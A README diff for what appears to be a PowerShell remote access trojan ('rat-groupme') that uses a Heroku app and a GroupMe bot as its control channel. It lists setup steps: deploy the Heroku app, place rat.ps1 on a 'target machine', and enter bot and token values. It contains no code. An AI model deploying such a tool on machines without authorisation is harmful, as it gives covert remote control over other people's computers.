brytonh/rat-groupme/README.md

 The rat.ps1 will need to be ran from the client.

+## Steps to Reproduce
 1. Setup a Python HerokuApp using the files I've provided.
 Heroku Git is a magical thing.
 2. Put the rat.ps1 on the machine you're testing as your client/target machine.
 As of right now, I have tested this on Win10.
 I will be rewriting the script for Powershell 2.0.
+3. Make the necessary changes based on your personal API information.

+### In rat.ps1:
+* Set bot_id on line 12
+* Set GM_TOKEN on line 20
+* Provide your HerokuApp URL on line 36